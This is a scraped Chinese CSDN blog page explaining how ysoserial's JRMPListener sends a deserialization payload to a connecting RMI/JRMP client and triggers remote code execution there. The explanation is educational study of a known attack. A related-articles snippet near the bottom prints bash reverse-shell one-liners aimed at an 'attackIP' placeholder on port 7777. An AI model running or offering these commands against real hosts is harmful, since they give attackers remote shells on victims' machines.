Yso-JRMPListener模块学习

最新推荐文章于 2024-07-20 17:12:48 发布
最新推荐文章于 2024-07-20 17:12:48 发布
阅读量141 收藏
点赞数
文章标签: python 开发语言 java tomcat 算法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/why811/article/details/132585175
版权

JRMP 服务端

ysoserial 中的 exploit/JRMPListener 会在指定端口开启一个 JRMP Server,其实现了对任意 RMI Client 的应答请求,会向任何连接其的客户端发送反序列化 payload。

注意:区别这里的 JRMP Client 指的是发起 JRMP 请求的一方(下文以 Client 或者 客户端 称呼),既可能是 RMI Server,也可能是 RMI Client(两者都可以向 RMI Registry 发起 JRMP 请求)。

先来看入口的 main 方法:

获取用户的输入,生成对应的 payload,然后和指定的端口传入构造方法,接着调用 run 方法。

生成 payloadObject 的过程省略,看 JRMPListener 的构造方法:

构造方法中还额外创建了一个 ServerSocket 接收来自 JRMPClient 的连接。

run 方法中会对接收的请求进行协议的限制,如果是 JRMP 协议就进入 doMessage 方法:

deMessage 里会根据读取到的 op 进行不同的操作:

TransportConstants.Call 的值是 80,对应着客户端发送的 headerStreamRemoteCall#<init>):

doCall 方法里会生成一个 BadAttributeValueExpException 对象,然后通过反射把其 val 变量设置为 payload,最后序列化向客户端发送:

JRMP 客户端

再来看客户端,以 list 方法为例,客户端执行这个方法的时候会来到 UnicastRef#invoke 方法里,调用栈如下:

invoke:379, UnicastRef (sun.rmi.server)

list:-1, RegistryImpl_Stub (sun.rmi.registry)

main:9, RMIClient (RAC2S)

"UnicastRef#invoke",向 JRMP 服务端发起连接请求,重点是 StreamRemoteCall#executeCall 方法:

在这个方法里客户端会将服务端发送的异常进行序列化读取,然后抛出,导致了自身被 RCE。

因为 JRMPListener 中向客户端发送的就是 2,所以一定会进入 case 2 中:

why811
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3321
ysoserial这款工具,堪称为“java反序列利用神器”。
ysoserial之JRMP源码分析(payloads.JRMPClient/exploit.JRMPListener)
weixin_45682070的博客
03-11 1359
前言 本来是想复现weblogicCVE-2017-3248漏洞的,这个漏洞使用了ysoserial的jrmp模块,开启rmi监听进行通信的,达到执行任意反序列化 payload。下文有些概念比较晦涩难懂,建议查阅其他资料配合使用。 JRMP协议是什么 JRMP全称为Java Remote Method Protocol,也就是Java远程方法协议。 一个RMI的过程,是用到JRMP这个协议去组织数据格式然后通过TCP进行传输,从而达到RMI,也就是远程方法调用。 JRMP是一个协议,是用于Java RMI
ysoserial exploit/JRMPListener原理剖析
hldfight
03-19 2300
ysoserial exploit/JRMPListener原理剖析0 前言1 payloads/JRMPClient1.1 Externalizable1.2 生成payload1.3 gadget链分析2 exploit/JRMPListener3 总结 0 前言 上一篇文章讲了ysoserial exploit/JRMPClient的原理,本篇接着讲一下ysoserial exploit/J...
java 反序列化 ysoserial exploit/JRMPClient 原理剖析
whatday的专栏
06-26 3320
目录 0 前言 1payloads/JRMPListener 1.1 payload生成 1.2gadget链分析 2使用RMIRegistryExploit攻击上述开启的监听 3 exploit/JRMPClient 3.1分布式垃圾收集(DGC) 3.2exploit/JRMPClient代码分析 4 总结 0 前言 ysoserial中的exploit/JRMPClient是作为攻击方的代码,一般会结合payloads/JRMPLIstener使用,攻击流程就是:...
ysoserial exploit/JRMPClient原理剖析
hldfight
03-15 2884
0 前言 ysoserial中的exploit/JRMPClient是作为攻击方的代码,一般会结合payloads/JRMPLIstener使用,攻击流程就是: 1、先往存在漏洞的服务器发送payloads/JRMPLIstener,使服务器反序列化该gadget后,会开启一个rmi服务并监听在设置的端口 2、然后攻击方在自己的服务器使用exploit/JRMPClient与存在漏洞的服务器...
Apache shiro1.2.4 Getshell
zhalang8324的博客
06-16 741
方法一 利用JRMPClient 反弹shell方式 Bash: bash -i >& /dev/tcp/attackIP/7777 0>&1 /bin/bash -i > /dev/tcp/attackIP/7777 0<&1 2>&1 0<&196;exec 196<>/dev/tcp/attackIP/7777; sh <&196 >&196 2>&196 P
y-websocket:Yso的Websocket连接器
05-02
y-websocket :top_hat: Yjs的WebSocket提供程序 Websocket Provider实现了经典的客户端服务器模型。 客户端通过Websocket连接到单个端点。 服务器在客户端之间分发意识信息和文档更新。 如果您想要一个用于处理...
Y-net资料.rar
04-12
Y-Net, 在Unet的基础上,添加在一个输出分支,可以应用于两个物理量,或者两个参数的同时求解
语言-精易模块源码V8.0.5
06-25
精易模块V8.0.5 what's new:(20200201) 一、新增 1、新增“外部树型框 - 取上一个同级项目”,返回指定项目索引的上一个同级索引;感谢【@阿杰大大 】提供; 2、新增“外部树型框 - 取下一个同级项目”,返回指定...
中文 ASME_Y14.5-2018_Dimensioning_and_Tolerancing.pdf
04-06
中文 ASME Y14.5-2018 Dimensioning and Tolerancing - Engineering Drawing and Related Documentation Practices
Y86-64指令模拟器
04-03
通过编写和运行Y86-64代码,学习者可以直观地看到机器指令如何控制计算机硬件的运行。 首先,我们需要了解Y86指令集。Y86是一个简化的RISC(精简指令集计算机)架构,设计用来模拟Intel的复杂CISC(复杂指令集...
Weblogic CVE-2018-2628 T3协议反序列化命令执行漏洞
读书 买花 长大
02-19 884
CVE-2018-2628
jrmp协议_ysoserial JRMP相关模块分析(二)- payloads/JRMPClient & exploit/JRMPListener
weixin_39876145的博客
12-24 674
简介payloads/JRMPClient 生存的 payload 是发送给目标机器的,exploit/JRMPListener 是在自己服务器上使用的,payloads/JRMPClient 的利用,离不开 exploit/JRMPListener ,反之 exploit/JRMPListener 的利用,在上篇文章中,它是可以独立使用的这篇文章是记录 payloads/JRMPClient 的...
java 反序列化 ysoserial exploit/JRMPListener 原理剖析
whatday的专栏
06-26 1677
目录 0 前言 1 payloads/JRMPClient 1.1 Externalizable 1.2 生成payload 1.3 gadget链分析 2 exploit/JRMPListener 3 总结 0 前言 上一篇文章讲了 《java 反序列化 ysoserial exploit/JRMPClient 原理剖析》 https://blog.csdn.net/whatday/article/details/106971531 ,本篇接着讲一下ysoserial expl.
java反序列化工具ysoserial.jar浅析
谢公子的博客
07-19 8730
ysoserial.jar ysoserial是集合了各种java反序列化payload的工具,项目地址:https://github.com/frohoff/ysoserial
反序列化工具ysoserial使用介绍
热门推荐
weixin_34275734的博客
08-10 2万+
反序列化工具ysoserial使用介绍 0x00 ysoserial是什么? ysoserial集合了各种java反序列化payload;下载地址:https://github.com/angelwhu/ysoserial 0x01 基本使用方法 在公网vps上执行: java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit....
使用Python的Turtle库绘制动态风车
最新发布
爱写代码的小朋友
07-20 191
python绘制风车
华为od机试真题 — 代表团坐车(Python)
学习,你不是一个人在战斗 ~ 961302305(QQ,微信)
07-17 596
【华为od机试真题 】代表团坐车(Python) 某组织举行会议,来了多个代表团同时到达,接待处只有一辆汽车可以同时接待多个代表团,为了提高车辆利用率,请帮接待员计算可以坐满车的接待方案输出方案数量。
Python如何将字符串连接在一起并使用`join()`方法】
qq_36253366的博客
07-19 259
方法是字符串对象的方法,而不是列表或元组等序列类型的方法。因此,你需要先指定一个用作分隔符的字符串,然后调用这个字符串的。方法将字符串连接在一起,你需要首先确保这些字符串被存储在一个序列类型中(如列表或元组),然后调用这个序列的。方法是一个字符串方法,它用于将序列(如列表、元组等)中的元素以指定的字符连接生成一个新的字符串。列表中的所有字符串元素使用空格作为分隔符连接成一个新的字符串。方法,并将你想要作为分隔符的字符串作为参数传递给。方法,并将包含要连接字符串的序列作为参数传递。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值